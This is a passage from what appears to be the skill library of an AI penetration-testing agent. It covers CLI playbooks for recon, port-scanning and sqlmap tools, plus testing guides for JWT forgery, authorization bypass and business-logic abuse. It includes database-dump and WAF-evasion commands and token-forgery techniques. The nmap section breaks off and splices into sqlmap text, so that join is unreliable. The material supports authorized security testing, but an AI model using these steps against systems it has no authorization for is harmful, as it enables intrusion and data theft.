replay).\n\nUsage rules:\n- Use `-silent` for pipeline-friendly output.\n- Use `-mc/-fc` when downstream steps depend on specific response classes.\n- Prefer `-proxy` flag over global proxy env vars when only httpx traffic should be proxied.\n- Do not use `-h`/`--help` for routine runs unless absolutely necessary.\n\nFailure recovery:\n- If too many timeouts occur, reduce `-rl/-t` and/or increase `-timeout`.\n- If output is noisy, add `-fc` filters or `-fd` duplicate filtering.\n- If HTTPS-only probing misses HTTP services, rerun with `-nf` (and avoid `-nfs`).\n\nIf uncertain, query web_search with:\n`site:docs.projectdiscovery.io httpx usage`\n" }, { "path": "strix/skills/tooling/katana.md", "content": "---\nname: katana\ndescription: Katana crawler syntax, depth/js/known-files behavior, and stable concurrency controls.\n---\n\n# Katana CLI Playbook\n\nOfficial docs:\n- https://docs.projectdiscovery.io/opensource/katana/usage\n- https://docs.projectdiscovery.io/opensource/katana/running\n- https://github.com/projectdiscovery/katana\n\nCanonical syntax:\n`katana [flags]`\n\nHigh-signal flags:\n- `-u, -list ` target URL(s)\n- `-d, -depth ` crawl depth\n- `-jc, -js-crawl` parse JavaScript-discovered endpoints\n- `-jsl, -jsluice` deeper JS parsing (memory intensive)\n- `-kf, -known-files ` known-file crawling mode\n- `-proxy ` explicit proxy setting\n- `-c, -concurrency ` concurrent fetchers\n- `-p, -parallelism ` concurrent input targets\n- `-rl, -rate-limit ` request rate limit\n- `-timeout ` request timeout\n- `-retry ` retry count\n- `-ef, -extension-filter ` extension exclusions\n- `-tlsi, -tls-impersonate` experimental JA3/TLS impersonation\n- `-hl, -headless` enable hybrid headless crawling\n- `-sc, -system-chrome` use local Chrome for headless mode\n- `-ho, -headless-options ` extra Chrome options (for example proxy-server)\n- `-nos, -no-sandbox` run Chrome headless with no-sandbox\n- `-noi, -no-incognito` disable incognito in headless mode\n- `-cdd, -chrome-data-dir ` persist browser profile/session\n- `-xhr, -xhr-extraction` include XHR endpoints in JSONL output\n- `-silent`, `-j, -jsonl`, `-o ` output controls\n\nAgent-safe baseline for automation:\n`mkdir -p crawl && katana -u https://target.tld -d 3 -jc -kf robotstxt -c 10 -p 10 -rl 50 -timeout 10 -retry 1 -ef png,jpg,jpeg,gif,svg,css,woff,woff2,ttf,eot,map -silent -j -o crawl/katana.jsonl`\n\nCommon patterns:\n- Fast crawl baseline:\n `katana -u https://target.tld -d 3 -jc -silent`\n- Deeper JS-aware crawl:\n `katana -u https://target.tld -d 5 -jc -jsl -kf all -c 10 -p 10 -rl 50 -o katana_urls.txt`\n- Multi-target run with JSONL output:\n `katana -list urls.txt -d 3 -jc -silent -j -o katana.jsonl`\n- Headless crawl with local Chrome:\n `katana -u https://target.tld -hl -sc -nos -xhr -j -o crawl/katana_headless.jsonl`\n- Headless crawl through proxy:\n `katana -u https://target.tld -hl -sc -ho proxy-server=http://127.0.0.1:48080 -j -o crawl/katana_proxy.jsonl`\n\nCritical correctness rules:\n- `-kf` must be followed by one of `all`, `robotstxt`, or `sitemapxml`.\n- Use documented `-hl` for headless mode.\n- `-proxy` expects a single proxy URL string (for example `http://127.0.0.1:8080`).\n- `-ho` expects comma-separated Chrome options (example: `-ho --disable-gpu,proxy-server=http://127.0.0.1:8080`).\n- For `-kf`, keep depth at least `-d 3` so known files are fully covered.\n- If writing to a file, ensure parent directory exists before `-o`.\n\nUsage rules:\n- Keep `-d`, `-c`, `-p`, and `-rl` explicit for reproducible runs.\n- Use `-ef` early to reduce static-file noise before fuzzing.\n- Prefer `-proxy` over environment proxy variables when proxying only Katana traffic.\n- Use `-hc` only for one-time diagnostics, not routine crawling loops.\n- Do not use `-h`/`--help` for routine runs unless absolutely necessary.\n\nFailure recovery:\n- If crawl runs too long, lower `-d` and optionally add `-ct`.\n- If memory spikes, disable `-jsl` and lower `-c/-p`.\n- If headless fails with Chrome errors, drop `-sc` or install system Chrome.\n- If output is noisy, tighten scope and add `-ef` filters.\n\nIf uncertain, query web_search with:\n`site:docs.projectdiscovery.io katana usage`\n" }, { "path": "strix/skills/tooling/naabu.md", "content": "---\nname: naabu\ndescription: Naabu port-scanning syntax with host input, scan-type, verification, and rate controls.\n---\n\n# Naabu CLI Playbook\n\nOfficial docs:\n- https://docs.projectdiscovery.io/opensource/naabu/usage\n- https://docs.projectdiscovery.io/opensource/naabu/running\n- https://github.com/projectdiscovery/naabu\n\nCanonical syntax:\n`naabu [flags]`\n\nHigh-signal flags:\n- `-host ` single host\n- `-list, -l ` hosts list\n- `-p ` explicit ports (supports ranges)\n- `-top-ports ` top ports profile\n- `-exclude-ports ` exclusions\n- `-scan-type ` SYN or CONNECT scan\n- `-Pn` skip host discovery\n- `-rate ` packets per second\n- `-c ` worker count\n- `-timeout ` per-probe timeout in milliseconds\n- `-retries ` retry attempts\n- `-proxy ` SOCKS5 proxy\n- `-verify` verify discovered open ports\n- `-j, -json` JSONL output\n- `-silent` compact output\n- `-o ` output file\n\nAgent-safe baseline for automation:\n`naabu -list hosts.txt -top-ports 100 -scan-type c -Pn -rate 300 -c 25 -timeout 1000 -retries 1 -verify -silent -j -o naabu.jsonl`\n\nCommon patterns:\n- Top ports with controlled rate:\n `naabu -list hosts.txt -top-ports 100 -scan-type c -rate 300 -c 25 -timeout 1000 -retries 1 -verify -silent -o naabu.txt`\n- Focused web-ports sweep:\n `naabu -list hosts.txt -p 80,443,8080,8443 -scan-type c -rate 300 -c 25 -timeout 1000 -retries 1 -verify -silent`\n- Single-host quick check:\n `naabu -host target.tld -p 22,80,443 -scan-type c -rate 300 -c 25 -timeout 1000 -retries 1 -verify`\n- Root SYN mode (if available):\n `sudo naabu -list hosts.txt -top-ports 100 -scan-type syn -rate 500 -c 25 -timeout 1000 -retries 1 -verify -silent`\n\nCritical correctness rules:\n- Use `-scan-type connect` when running without root/privileged raw socket access.\n- Always set `-timeout` explicitly; it is in milliseconds.\n- Set `-rate` explicitly to avoid unstable or noisy scans.\n- `-timeout` is in milliseconds, not seconds.\n- Keep port scope tight: prefer explicit important ports or a small `-top-ports` value unless broader coverage is explicitly required.\n- Do not spam traffic; start with the smallest useful port set and conservative rate/worker settings.\n- Prefer `-verify` before handing ports to follow-up scanners.\n\nUsage rules:\n- Keep host discovery behavior explicit (`-Pn` or default discovery).\n- Use `-j -o ` for automation pipelines.\n- Prefer `-p 22,80,443,8080,8443` or `-top-ports 100` before considering larger sweeps.\n- Do not use `-h`/`--help` for normal flow unless absolutely necessary.\n\nFailure recovery:\n- If privileged socket errors occur, switch to `-scan-type c`.\n- If scans are slow or lossy, lower `-rate`, lower `-c`, and tighten `-p`/`-top-ports`.\n- If many hosts appear down, compare runs with and without `-Pn`.\n\nIf uncertain, query web_search with:\n`site:docs.projectdiscovery.io naabu usage`\n" }, { "path": "strix/skills/tooling/nmap.md", "content": "---\nname: nmap\ndescription: Canonical Nmap CLI syntax, two-pass scanning workflow, and sandbox-safe bounded scan patterns.\n---\n\n# Nmap CLI Playbook\n\nOfficial docs:\n- https://nmap.org/book/man-briefoptions.html\n- https://nmap.org/book/man.html\n- https://nmap.org/book/man-performance.html\n\nCanonical syntax:\n`nmap [Scan Type(s)] [Options] {target specification}`\n\nHigh-signal flags:\n- `-n` skip DNS resolution\n- `-Pn` skip host discovery when ICMP/ping is filtered\n- `-sS` SYN scan (root/privileged)\n- `-sT` TCP connect scan (no raw-socket privilege)\n- `-sV` detect service versions\n- `-sC` run default NSE scripts\n- `-p ` explicit ports (`-p-` for all TCP ports)\n- `--top-ports ` quick common-port sweep\n- `--open` show only hosts with open ports\n- `-T<0-5>` timing template (`-T4` common)\n- `--max-retries ` cap retransmissions\n- `--host-timeout
--columns`, `-D -T
-C --dump`\n- `--flush-session` clear cached scan state\n\nAgent-safe baseline for automation:\n`sqlmap -u \"https://target.tld/item?id=1\" -p id --batch --level 2 --risk 1 --threads 5 --timeout 10 --retries 1 --random-agent`\n\nCommon patterns:\n- Baseline injection check:\n `sqlmap -u \"https://target.tld/item?id=1\" -p id --batch --level 2 --risk 1 --threads 5`\n- POST parameter testing:\n `sqlmap -u \"https://target.tld/login\" --data \"user=admin&pass=test\" -p pass --batch --level 2 --risk 1`\n- Form-driven testing:\n `sqlmap -u \"https://target.tld/login\" --forms --batch --level 2 --risk 1 --random-agent`\n- Enumerate DBs:\n `sqlmap -u \"https://target.tld/item?id=1\" -p id --batch --dbs`\n- Enumerate tables in DB:\n `sqlmap -u \"https://target.tld/item?id=1\" -p id --batch -D appdb --tables`\n- Dump selected columns:\n `sqlmap -u \"https://target.tld/item?id=1\" -p id --batch -D appdb -T users -C id,email,role --dump`\n\nCritical correctness rules:\n- Always include `--batch` in automation to avoid interactive prompts.\n- Keep target parameter explicit with `-p` when possible.\n- Use `--flush-session` when retesting after request/profile changes.\n- Start conservative (`--level 1-2`, `--risk 1`) and escalate only when needed.\n\nUsage rules:\n- Keep authenticated context (`--cookie`/`--headers`) aligned with manual validation state.\n- Prefer narrow extraction (`-D/-T/-C`) over broad dump-first behavior.\n- Do not use `-h`/`--help` during normal execution unless absolutely necessary.\n\nFailure recovery:\n- If results conflict with manual testing, rerun with `--flush-session`.\n- If blocked by filtering/WAF, reduce `--threads` and test targeted `--tamper` chains.\n- If initial detection misses likely injection, increment `--level`/`--risk` gradually.\n\nIf uncertain, query web_search with:\n`site:github.com/sqlmapproject/sqlmap/wiki/usage sqlmap `\n" }, { "path": "strix/skills/tooling/subfinder.md", "content": "---\nname: subfinder\ndescription: Subfinder passive subdomain enumeration syntax, source controls, and pipeline-ready output patterns.\n---\n\n# Subfinder CLI Playbook\n\nOfficial docs:\n- https://docs.projectdiscovery.io/opensource/subfinder/usage\n- https://docs.projectdiscovery.io/opensource/subfinder/running\n- https://github.com/projectdiscovery/subfinder\n\nCanonical syntax:\n`subfinder [flags]`\n\nHigh-signal flags:\n- `-d ` single domain\n- `-dL ` domain list\n- `-all` include all sources\n- `-recursive` use recursive-capable sources\n- `-s ` include specific sources\n- `-es ` exclude specific sources\n- `-rl ` global rate limit\n- `-rls ` per-source rate limits\n- `-proxy ` proxy outbound source requests\n- `-silent` compact output\n- `-o ` output file\n- `-oJ, -json` JSONL output\n- `-cs, -collect-sources` include source metadata (`-oJ` output)\n- `-nW, -active` show only active subdomains\n- `-timeout ` request timeout\n- `-max-time ` overall enumeration cap\n\nAgent-safe baseline for automation:\n`subfinder -d example.com -all -recursive -rl 20 -timeout 30 -silent -oJ -o subfinder.jsonl`\n\nCommon patterns:\n- Standard passive enum:\n `subfinder -d example.com -silent -o subs.txt`\n- Broad-source passive enum:\n `subfinder -d example.com -all -recursive -silent -o subs_all.txt`\n- Multi-domain run:\n `subfinder -dL domains.txt -all -recursive -rl 20 -silent -o subfinder_out.txt`\n- Source-attributed JSONL output:\n `subfinder -d example.com -all -oJ -cs -o subfinder_sources.jsonl`\n- Passive enum via explicit proxy:\n `subfinder -d example.com -all -recursive -proxy http://127.0.0.1:48080 -silent -oJ -o subfinder_proxy.jsonl`\n\nCritical correctness rules:\n- `-cs` is useful only with JSON output (`-oJ`).\n- Many sources require API keys in provider config; low results can be config-related, not target-related.\n- `-nW` performs active resolution/filtering and can drop passive-only hits.\n- Keep passive enum first, then validate with `httpx`.\n\nUsage rules:\n- Keep output files explicit when chaining to `httpx`/`nuclei`.\n- Use `-rl/-rls` when providers throttle aggressively.\n- Do not use `-h`/`--help` for routine tasks unless absolutely necessary.\n\nFailure recovery:\n- If results are unexpectedly low, rerun with `-all` and verify provider config/API keys.\n- If provider errors appear, lower `-rl` and apply `-rls` per source.\n- If runs take too long, lower scope or split domain batches.\n\nIf uncertain, query web_search with:\n`site:docs.projectdiscovery.io subfinder usage`\n" }, { "path": "strix/skills/vulnerabilities/authentication_jwt.md", "content": "---\nname: authentication-jwt\ndescription: JWT and OIDC security testing covering token forgery, algorithm confusion, and claim manipulation\n---\n\n# Authentication / JWT / OIDC\n\nJWT/OIDC failures often enable token forgery, token confusion, cross-service acceptance, and durable account takeover. Do not trust headers, claims, or token opacity without strict validation bound to issuer, audience, key, and context.\n\n## Attack Surface\n\n- Web/mobile/API authentication using JWT (JWS/JWE) and OIDC/OAuth2\n- Access vs ID tokens, refresh tokens, device/PKCE/Backchannel flows\n- First-party and microservices verification, gateways, and JWKS distribution\n\n## Reconnaissance\n\n### Endpoints\n\n- Well-known: `/.well-known/openid-configuration`, `/oauth2/.well-known/openid-configuration`\n- Keys: `/jwks.json`, rotating key endpoints, tenant-specific JWKS\n- Auth: `/authorize`, `/token`, `/introspect`, `/revoke`, `/logout`, device code endpoints\n- App: `/login`, `/callback`, `/refresh`, `/me`, `/session`, `/impersonate`\n\n### Token Features\n\n- Headers: `{\"alg\":\"RS256\",\"kid\":\"...\",\"typ\":\"JWT\",\"jku\":\"...\",\"x5u\":\"...\",\"jwk\":{...}}`\n- Claims: `{\"iss\":\"...\",\"aud\":\"...\",\"azp\":\"...\",\"sub\":\"user\",\"scope\":\"...\",\"exp\":...,\"nbf\":...,\"iat\":...}`\n- Formats: JWS (signed), JWE (encrypted). Note unencoded payload option (`\"b64\":false`) and critical headers (`\"crit\"`)\n\n## Key Vulnerabilities\n\n### Signature Verification\n\n- RS256β†’HS256 confusion: change alg to HS256 and use the RSA public key as HMAC secret if algorithm is not pinned\n- \"none\" algorithm acceptance: set `\"alg\":\"none\"` and drop the signature if libraries accept it\n- ECDSA malleability/misuse: weak verification settings accepting non-canonical signatures\n\n### Header Manipulation\n\n- **kid injection**: path traversal `../../../../keys/prod.key`, SQL/command/template injection in key lookup, or pointing to world-readable files\n- **jku/x5u abuse**: host attacker-controlled JWKS/X509 chain; if not pinned/whitelisted, server fetches and trusts attacker keys\n- **jwk header injection**: embed attacker JWK in header; some libraries prefer inline JWK over server-configured keys\n- **SSRF via remote key fetch**: exploit JWKS URL fetching to reach internal hosts\n\n### Key and Cache Issues\n\n- JWKS caching TTL and key rollover: accept obsolete keys; race rotation windows; missing kid pinning β†’ accept any matching kty/alg\n- Mixed environments: same secrets across dev/stage/prod; key reuse across tenants or services\n- Fallbacks: verification succeeds when kid not found by trying all keys or no keys (implementation bugs)\n\n### Claims Validation Gaps\n\n- iss/aud/azp not enforced: cross-service token reuse; accept tokens from any issuer or wrong audience\n- scope/roles fully trusted from token: server does not re-derive authorization; privilege inflation via claim edits when signature checks are weak\n- exp/nbf/iat not enforced or large clock skew tolerance; accept long-expired or not-yet-valid tokens\n- typ/cty not enforced: accept ID token where access token required (token confusion)\n\n### Token Confusion and OIDC\n\n- Access vs ID token swap: use ID token against APIs when they only verify signature but not audience/typ\n- OIDC mix-up: redirect_uri and client mix-ups causing tokens for Client A to be redeemed at Client B\n- PKCE downgrades: missing S256 requirement; accept plain or absent code_verifier\n- State/nonce weaknesses: predictable or missing β†’ CSRF/logical interception of login\n- Device/Backchannel flows: codes and tokens accepted by unintended clients or services\n\n### Refresh and Session\n\n- Refresh token rotation not enforced: reuse old refresh token indefinitely; no reuse detection\n- Long-lived JWTs with no revocation: persistent access post-logout\n- Session fixation: bind new tokens to attacker-controlled session identifiers or cookies\n\n### Transport and Storage\n\n- Token in localStorage/sessionStorage: susceptible to XSS exfiltration; cookie vs header trade-offs with SameSite/CSRF\n- Insecure CORS: wildcard origins with credentialed requests expose tokens and protected responses\n- TLS and cookie flags: missing Secure/HttpOnly; lack of mTLS or DPoP/\"cnf\" binding permits replay from another device\n\n## Advanced Techniques\n\n### Microservices and Gateways\n\n- Audience mismatch: internal services verify signature but ignore aud β†’ accept tokens for other services\n- Header trust: edge or gateway injects X-User-Id; backend trusts it over token claims\n- Asynchronous consumers: workers process messages with bearer tokens but skip verification on replay\n\n### JWS Edge Cases\n\n- Unencoded payload (b64=false) with crit header: libraries mishandle verification paths\n- Nested JWT (JWT-in-JWT) verification order errors; outer token accepted while inner claims ignored\n\n## Special Contexts\n\n### Mobile\n\n- Deep-link/redirect handling bugs leak codes/tokens; insecure WebView bridges exposing tokens\n- Token storage in plaintext files/SQLite/Keychain/SharedPrefs; backup/adb accessible\n\n### SSO Federation\n\n- Misconfigured trust between multiple IdPs/SPs, mixed metadata, or stale keys lead to acceptance of foreign tokens\n\n## Chaining Attacks\n\n- XSS β†’ token theft β†’ replay across services with weak audience checks\n- SSRF β†’ fetch private JWKS β†’ sign tokens accepted by internal services\n- Host header poisoning β†’ OIDC redirect_uri poisoning β†’ code capture\n- IDOR in sessions/impersonation endpoints β†’ mint tokens for other users\n\n## Testing Methodology\n\n1. **Inventory issuers/consumers** - Identity providers, API gateways, services, mobile/web clients\n2. **Capture tokens** - Access and ID tokens for multiple roles; note header, claims, signature\n3. **Map verification endpoints** - `/.well-known`, `/jwks.json`\n4. **Build matrix** - Token Type Γ— Audience Γ— Service; attempt cross-use\n5. **Mutate components** - Headers (alg, kid, jku/x5u/jwk), claims (iss/aud/azp/sub/exp), signatures\n6. **Verify enforcement** - What is actually checked vs assumed\n\n## Validation\n\n1. Show forged or cross-context token acceptance (wrong alg, wrong audience/issuer, or attacker-signed JWKS)\n2. Demonstrate access token vs ID token confusion at an API\n3. Prove refresh token reuse without rotation detection or revocation\n4. Confirm header abuse (kid/jku/x5u/jwk) leading to key selection under attacker control\n5. Provide owner vs non-owner evidence with identical requests differing only in token context\n\n## False Positives\n\n- Token rejected due to strict audience/issuer enforcement\n- Key pinning with JWKS whitelist and TLS validation\n- Short-lived tokens with rotation and revocation on logout\n- ID token not accepted by APIs that require access tokens\n\n## Impact\n\n- Account takeover and durable session persistence\n- Privilege escalation via claim manipulation or cross-service acceptance\n- Cross-tenant or cross-application data access\n- Token minting by attacker-controlled keys or endpoints\n\n## Pro Tips\n\n1. Pin verification to issuer and audience; log and diff claim sets across services\n2. Attempt RS256β†’HS256 and \"none\" first only if algorithm pinning is unclear; otherwise focus on header key control (kid/jku/x5u/jwk)\n3. Test token reuse across all services; many backends only check signature, not audience/typ\n4. Exploit JWKS caching and rotation races; try retired keys and missing kid fallbacks\n5. Exercise OIDC flows with PKCE/state/nonce variants and mixed clients; look for mix-up\n6. Try DPoP/mTLS absence to replay tokens from different devices\n7. Treat refresh as its own surface: rotation, reuse detection, and audience scoping\n8. Validate every acceptance path: gateway, service, worker, WebSocket, and gRPC\n9. Favor minimal PoCs that clearly show cross-context acceptance and durable access\n10. When in doubt, assume verification differs per stack (mobile vs web vs gateway) and test each\n\n## Summary\n\nVerification must bind the token to the correct issuer, audience, key, and client context on every acceptance path. Any missing binding enables forgery or confusion.\n" }, { "path": "strix/skills/vulnerabilities/broken_function_level_authorization.md", "content": "---\nname: broken-function-level-authorization\ndescription: BFLA testing for action-level authorization failures across endpoints, admin functions, and API operations\n---\n\n# Broken Function Level Authorization (BFLA)\n\nBFLA is action-level authorization failure: callers invoke functions (endpoints, mutations, admin tools) they are not entitled to. It appears when enforcement differs across transports, gateways, roles, or when services trust client hints. Bind subject Γ— action at the service that performs the action.\n\n## Attack Surface\n\n- Vertical authz: privileged/admin/staff-only actions reachable by basic users\n- Feature gates: toggles enforced at edge/UI, not at core services\n- Transport drift: REST vs GraphQL vs gRPC vs WebSocket with inconsistent checks\n- Gateway trust: backends trust X-User-Id/X-Role injected by proxies/edges\n- Background workers/jobs performing actions without re-checking authz\n\n## High-Value Actions\n\n- Role/permission changes, impersonation/sudo, invite/accept into orgs\n- Approve/void/refund/credit issuance, price/plan overrides\n- Export/report generation, data deletion, account suspension/reactivation\n- Feature flag toggles, quota/grant adjustments, license/seat changes\n- Security settings: 2FA reset, email/phone verification overrides\n\n## Reconnaissance\n\n### Surface Enumeration\n\n- Admin/staff consoles and APIs, support tools, internal-only endpoints exposed via gateway\n- Hidden buttons and disabled UI paths (feature-flagged) mapped to still-live endpoints\n- GraphQL schemas: mutations and admin-only fields/types; gRPC service descriptors (reflection)\n- Mobile clients often reveal extra endpoints/roles in app bundles or network logs\n\n### Signals\n\n- 401/403 on UI but 200 via direct API call; differing status codes across transports\n- Actions succeed via background jobs when direct call is denied\n- Changing only headers (role/org) alters access without token change\n\n## Key Vulnerabilities\n\n### Verb Drift and Aliases\n\n- Alternate methods: GET performing state change; POST vs PUT vs PATCH differences; X-HTTP-Method-Override/_method\n- Alternate endpoints performing the same action with weaker checks (legacy vs v2, mobile vs web)\n\n### Edge vs Core Mismatch\n\n- Edge blocks an action but core service RPC accepts it directly; call internal service via exposed API route or SSRF\n- Gateway-injected identity headers override token claims; supply conflicting headers to test precedence\n\n### Feature Flag Bypass\n\n- Client-checked feature gates; call backend endpoints directly\n- Admin-only mutations exposed but hidden in UI; invoke via GraphQL or gRPC tools\n\n### Batch Job Paths\n\n- Create export/import jobs where creation is allowed but finalize/approve lacks authz; finalize others' jobs\n- Replay webhooks/background tasks endpoints that perform privileged actions without verifying caller\n\n### Content-Type Paths\n\n- JSON vs form vs multipart handlers using different middleware: send the action via the most permissive parser\n\n## Advanced Techniques\n\n### GraphQL\n\n- Resolver-level checks per mutation/field; do not assume top-level auth covers nested mutations or admin fields\n- Abuse aliases/batching to sneak privileged fields; persisted queries sometimes bypass auth transforms\n\n```graphql\nmutation Promote($id:ID!){\n a: updateUser(id:$id, role: ADMIN){ id role }\n}\n```\n\n### gRPC\n\n- Method-level auth via interceptors must enforce audience/roles; probe direct gRPC with tokens of lower role\n- Reflection lists services/methods; call admin methods that the gateway hid\n\n### WebSocket\n\n- Handshake-only auth: ensure per-message authorization on privileged events (e.g., admin:impersonate)\n- Try emitting privileged actions after joining standard channels\n\n### Multi-Tenant\n\n- Actions requiring tenant admin enforced only by header/subdomain; attempt cross-tenant admin actions by switching selectors with same token\n\n### Microservices\n\n- Internal RPCs trust upstream checks; reach them through exposed endpoints or SSRF; verify each service re-enforces authz\n\n## Bypass Techniques\n\n### Header Trust\n\n- Supply X-User-Id/X-Role/X-Organization headers; remove or contradict token claims; observe which source wins\n\n### Route Shadowing\n\n- Legacy/alternate routes (e.g., /admin/v1 vs /v2/admin) that skip new middleware chains\n\n### Idempotency and Retries\n\n- Retry or replay finalize/approve endpoints that apply state without checking actor on each call\n\n### Cache Key Confusion\n\n- Cached authorization decisions at edge leading to cross-user reuse; test with Vary and session swaps\n\n## Testing Methodology\n\n1. **Build Actor Γ— Action matrix** - Unauth, basic, premium, staff/admin; enumerate actions per role\n2. **Obtain tokens/sessions** - For each role\n3. **Exercise every action** - Across all transports and encodings (JSON, form, multipart), including method overrides\n4. **Vary headers and selectors** - Org/tenant/project; test behind gateway vs direct-to-service\n5. **Include background flows** - Job creation/finalization, webhooks, queues; confirm re-validation\n\n## Validation\n\n1. Show a lower-privileged principal successfully invokes a restricted action (same inputs) while the proper role succeeds and another lower role fails\n2. Provide evidence across at least two transports or encodings demonstrating inconsistent enforcement\n3. Demonstrate that removing/altering client-side gates (buttons/flags) does not affect backend success\n4. Include durable state change proof: before/after snapshots, audit logs, and authoritative sources\n\n## False Positives\n\n- Read-only endpoints mislabeled as admin but publicly documented\n- Feature toggles intentionally open to all roles for preview/beta with clear policy\n- Simulated environments where admin endpoints are stubbed with no side effects\n\n## Impact\n\n- Privilege escalation to admin/staff actions\n- Monetary/state impact: refunds/credits/approvals without authorization\n- Tenant-wide configuration changes, impersonation, or data deletion\n- Compliance and audit violations due to bypassed approval workflows\n\n## Pro Tips\n\n1. Start from the role matrix; test every action with basic vs admin tokens across REST/GraphQL/gRPC\n2. Diff middleware stacks between routes; weak chains often exist on legacy or alternate encodings\n3. Inspect gateways for identity header injection; never trust client-provided identity\n4. Treat jobs/webhooks as first-class: finalize/approve must re-check the actor\n5. Prefer minimal PoCs: one request that flips a privileged field or invokes an admin method with a basic token\n\n## Summary\n\nAuthorization must bind the actor to the specific action at the service boundary on every request and message. UI gates, gateways, or prior steps do not substitute for function-level checks.\n" }, { "path": "strix/skills/vulnerabilities/business_logic.md", "content": "---\nname: business-logic\ndescription: Business logic testing for workflow bypass, state manipulation, and domain invariant violations\n---\n\n# Business Logic Flaws\n\nBusiness logic flaws exploit intended functionality to violate domain invariants: move money without paying, exceed limits, retain privileges, or bypass reviews. They require a model of the business, not just payloads.\n\n## Attack Surface\n\n- Financial logic: pricing, discounts, payments, refunds, credits, chargebacks\n- Account lifecycle: signup, upgrade/downgrade, trial, suspension, deletion\n- Authorization-by-logic: feature gates, role transitions, approval workflows\n- Quotas/limits: rate/usage limits, inventory, entitlements, seat licensing\n- Multi-tenant isolation: cross-organization data or action bleed\n- Event-driven flows: jobs, webhooks, sagas, compensations, idempotency\n\n## High-Value Targets\n\n- Pricing/cart: price locks, quote to order, tax/shipping computation\n- Discount engines: stacking, mutual exclusivity, scope (cart vs item), once-per-user enforcement\n- Payments: auth/capture/void/refund sequences, partials, split tenders, chargebacks, idempotency keys\n- Credits/gift cards/vouchers: issuance, redemption, reversal, expiry, transferability\n- Subscriptions: proration, upgrade/downgrade, trial extension, seat counts, meter reporting\n- Refunds/returns/RMAs: multi-item partials, restocking fees, return window edges\n- Admin/staff operations: impersonation, manual adjustments, credit/refund issuance, account flags\n- Quotas/limits: daily/monthly usage, inventory reservations, feature usage counters\n\n## Reconnaissance\n\n### Workflow Mapping\n\n- Derive endpoints from the UI and proxy/network logs; map hidden/undocumented API calls, especially finalize/confirm endpoints\n- Identify tokens/flags: stepToken, paymentIntentId, orderStatus, reviewState, approvalId; test reuse across users/sessions\n- Document invariants: conservation of value (ledger balance), uniqueness (idempotency), monotonicity (non-decreasing counters), exclusivity (one active subscription)\n\n### Input Surface\n\n- Hidden fields and client-computed totals; server must recompute on trusted sources\n- Alternate encodings and shapes: arrays instead of scalars, objects with unexpected keys, null/empty/0/negative, scientific notation\n- Business selectors: currency, locale, timezone, tax region; vary to trigger rounding and ruleset changes\n\n### State and Time Axes\n\n- Replays: resubmit stale finalize/confirm requests\n- Out-of-order: call finalize before verify; refund before capture; cancel after ship\n- Time windows: end-of-day/month cutovers, daylight saving, grace periods, trial expiry edges\n\n## Key Vulnerabilities\n\n### State Machine Abuse\n\n- Skip or reorder steps via direct API calls; verify server enforces preconditions on each transition\n- Replay prior steps with altered parameters (e.g., swap price after approval but before capture)\n- Split a single constrained action into many sub-actions under the threshold (limit slicing)\n\n### Concurrency and Idempotency\n\n- Parallelize identical operations to bypass atomic checks (create, apply, redeem, transfer)\n- Abuse idempotency: key scoped to path but not principal β†’ reuse other users' keys; or idempotency stored only in cache\n- Message reprocessing: queue workers re-run tasks on retry without idempotent guards; cause duplicate fulfillment/refund\n\n### Numeric and Currency\n\n- Floating point vs decimal rounding; rounding/truncation favoring attacker at boundaries\n- Cross-currency arbitrage: buy in currency A, refund in B at stale rates; tax rounding per-item vs per-order\n- Negative amounts, zero-price, free shipping thresholds, minimum/maximum guardrails\n\n### Quotas, Limits, and Inventory\n\n- Off-by-one and time-bound resets (UTC vs local); pre-warm at T-1s and post-fire at T+1s\n- Reservation/hold leaks: reserve multiple, complete one, release not enforced; backorder logic inconsistencies\n- Distributed counters without strong consistency enabling double-consumption\n\n### Refunds and Chargebacks\n\n- Double-refund: refund via UI and support tool; refund partials summing above captured amount\n- Refund after benefits consumed (downloaded digital goods, shipped items) due to missing post-consumption checks\n\n### Feature Gates and Roles\n\n- Feature flags enforced client-side or at edge but not in core services; toggle names guessed or fallback to default-enabled\n- Role transitions leaving stale capabilities (retain premium after downgrade; retain admin endpoints after demotion)\n\n## Advanced Techniques\n\n### Event-Driven Sagas\n\n- Saga/compensation gaps: trigger compensation without original success; or execute success twice without compensation\n- Outbox/Inbox patterns missing idempotency β†’ duplicate downstream side effects\n- Cron/backfill jobs operating outside request-time authorization; mutate state broadly\n\n### Microservices Boundaries\n\n- Cross-service assumption mismatch: one service validates total, another trusts line items; alter between calls\n- Header trust: internal services trusting X-Role or X-User-Id from untrusted edges\n- Partial failure windows: two-phase actions where phase 1 commits without phase 2, leaving exploitable intermediate state\n\n### Multi-Tenant Isolation\n\n- Tenant-scoped counters and credits updated without tenant key in the where-clause; leak across orgs\n- Admin aggregate views allowing actions that impact other tenants due to missing per-tenant enforcement\n\n## Bypass Techniques\n\n- Content-type switching (JSON/form/multipart) to hit different code paths\n- Method alternation (GET performing state change; overrides via X-HTTP-Method-Override)\n- Client recomputation: totals, taxes, discounts computed on client and accepted by server\n- Cache/gateway differentials: stale decisions from CDN/APIM that are not identity-aware\n\n## Special Contexts\n\n### E-commerce\n\n- Stack incompatible discounts via parallel apply; remove qualifying item after discount applied; retain free shipping after cart changes\n- Modify shipping tier post-quote; abuse returns to keep product and refund\n\n### Banking/Fintech\n\n- Split transfers to bypass per-transaction threshold; schedule vs instant path inconsistencies\n- Exploit grace periods on holds/authorizations to withdraw again before settlement\n\n### SaaS/B2B\n\n- Seat licensing: race seat assignment to exceed purchased seats; stale license checks in background tasks\n- Usage metering: report late or duplicate usage to avoid billing or to over-consume\n\n## Chaining Attacks\n\n- Business logic + race: duplicate benefits before state updates\n- Business logic + IDOR: operate on others' resources once a workflow leak reveals IDs\n- Business logic + CSRF: force a victim to complete a sensitive step sequence\n\n## Testing Methodology\n\n1. **Enumerate state machine** - Per critical workflow (states, transitions, pre/post-conditions); note invariants\n2. **Build Actor Γ— Action Γ— Resource matrix** - Unauth, basic user, premium, staff/admin; identify actions per role\n3. **Test transitions** - Step skipping, repetition, reordering, late mutation\n4. **Introduce variance** - Time, concurrency, channel (mobile/web/API/GraphQL), content-types\n5. **Validate persistence boundaries** - All services, queues, and jobs re-enforce invariants\n\n## Validation\n\n1. Show an invariant violation (e.g., two refunds for one charge, negative inventory, exceeding quotas)\n2. Provide side-by-side evidence for intended vs abused flows with the same principal\n3. Demonstrate durability: the undesired state persists and is observable in authoritative sources (ledger, emails, admin views)\n4. Quantify impact per action and at scale (unit loss Γ— feasible repetitions)\n\n## False Positives\n\n- Promotional behavior explicitly allowed by policy (documented free trials, goodwill credits)\n- Visual-only inconsistencies with no durable or exploitable state change\n- 